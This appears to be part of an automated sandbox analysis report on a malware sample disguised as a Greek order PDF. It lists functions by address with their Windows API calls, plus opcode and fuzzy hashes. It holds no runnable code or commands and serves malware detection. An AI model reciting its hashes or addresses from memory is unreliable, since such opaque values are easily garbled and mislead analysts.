Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19

Function 00405C48 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,00405860,?,?,00000000,00405A43,?,?,?,?), ref: 00405C4D
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C61

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction ID: 7e700ee3acf44982365c3fbd0e808c401ff2a4825d9ccd2943b1641dd8ae7ae4
Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction Fuzzy Hash: ABD0A932004022ABC2002728AE0C88BBB90DB00270702CA35FCA4A22B1DB300C529A98

Function 0040573E Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403318,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405744
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405752

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction ID: 5acf7b5c2778cbfdcbae9b0437cf869adc97d3df665aa26c8b081b4f29c10bb0
Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction Fuzzy Hash: 53C04C30204501EFDA106B209E08B177AD0AB50741F2548396146E10A0DA789455F92E

Function 0040239C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: ba3bde256958aa91b5d9155f67b7e0bfbb45c1f83cf4986586dcfc7af96a5ed0
Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
Opcode Fuzzy Hash: ba3bde256958aa91b5d9155f67b7e0bfbb45c1f83cf4986586dcfc7af96a5ed0
Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279

Function 0040171F Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: d14bdcf4c531334952570e8fbab461e107b4b7945dcdc90744cade2c00435980
Instruction ID: eb17f69382d89759ebdee5c9dd5d6a4f0c1420afe9db4a8697d1259c8666677d
Opcode Fuzzy Hash: d14bdcf4c531334952570e8fbab461e107b4b7945dcdc90744cade2c00435980
Instruction Fuzzy Hash: 80E0D871304110EFD710DF649E49BAB3758DB01368B20817AF111A60C1D5B89905872D

Function 00405F88 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FB1

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
Instruction ID: 0f1f398a2e861ffee82e275805f4c84720ea89191264ee960a0e3bcb1bee2725
Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
Instruction Fuzzy Hash: DAE0ECB211450ABEEF099F90DC0ADBB371DEB04300F10492EF956E5090E6B9AE30AE75

Function 00405D14 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403290,00000000,00792120,000000FF,00792120,000000FF,000000FF,00000004,00000000), ref: 00405D28

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 77bff2a1fb4a149192ffadfb645e09873699659932145b723af6e3d7aa9a80e5
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: 35E0EC3222065AABDF109E659C04AEB7B6CEF05360F008837FE55F3190D635E9219BA8

Function 00405CE5 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032DA,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405CF9

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction ID: 359c21f91a3bba3ce6496bf321611394009143f850dd69016ead32bb33babeaa
Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction Fuzzy Hash: 08E0863210011EABCF106E909C08FEB775CEF00350F048433FD15E2040E230E8209BA4

Function 004023E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: b4a7043687678eaf2842448dab2c2e4ba0dbc20ac3a1ee677ae887269f19e7fe
Instruction ID: ec2b9ed2aa8753cc56e49b6d1f5b0ead50a941972cde74363bc07da0fbfd84e4
Opcode Fuzzy Hash: b4a7043687678eaf2842448dab2c2e4ba0dbc20ac3a1ee677ae887269f19e7fe
Instruction Fuzzy Hash: 40E04630904208BAEB006FA08E09EAD3A79EF01710F20003AF9617B0D1E6B89482D72E

Function 00405F5A Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405FE8,?,?,?,?,00000002,: Completed), ref: 00405F7E

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
Instruction ID: f6689eb4189efde595c0db3434e8a658027b475c8950a5948bd102936423b03e
Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
Instruction Fuzzy Hash: A4D0123210420EBBDF119F90DD05FAB371DEB08314F108426FE16A4091D775D930AB64

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 19daa51e0f4140c20b364a7b1aadfe9bb6fd55095eb541cb7129b1dc5595d207
Instruction ID: 91fe89217483e075e92c8728b5a4931aee7e8ed68981fb3eb44f78270fd31ef9
Opcode Fuzzy Hash: 19daa51e0f4140c20b364a7b1aadfe9bb6fd55095eb541cb7129b1dc5595d207
Instruction Fuzzy Hash: 25D0C232704114DBCB00EFA49B0868E73A1EB00324B30C137E011F21C1D6B8CA059A2D

Function 004041A4 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00010488,00000000,00000000,00000000), ref: 004041B6

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d4215b7baf76609f405edbe0fa82b00310db822e245eb28315c78f51e7c0a9c8
Instruction ID: 112480d2ae0494b2a53595d3f997b831fbc8a903dfd304933042e2292820a1e0
Opcode Fuzzy Hash: d4215b7baf76609f405edbe0fa82b00310db822e245eb28315c78f51e7c0a9c8
Instruction Fuzzy Hash: 40C09B757447007FDA109B649E49F0777D4A791700F14842DB740F50D1D674D450D65C

Function 004032DD Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,0001C3E4), ref: 004032EB

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D

Function 0040418D Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403FBD), ref: 0040419B

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8afc8e775a4383b0d9481be42871f9dd90f51651ac4b72857f61fbe09a3a2cc3
Instruction ID: 18e6939d06ef43c2e98f2159044487ea81de3fce7c02a663ceb4602929a6bce1
Opcode Fuzzy Hash: 8afc8e775a4383b0d9481be42871f9dd90f51651ac4b72857f61fbe09a3a2cc3
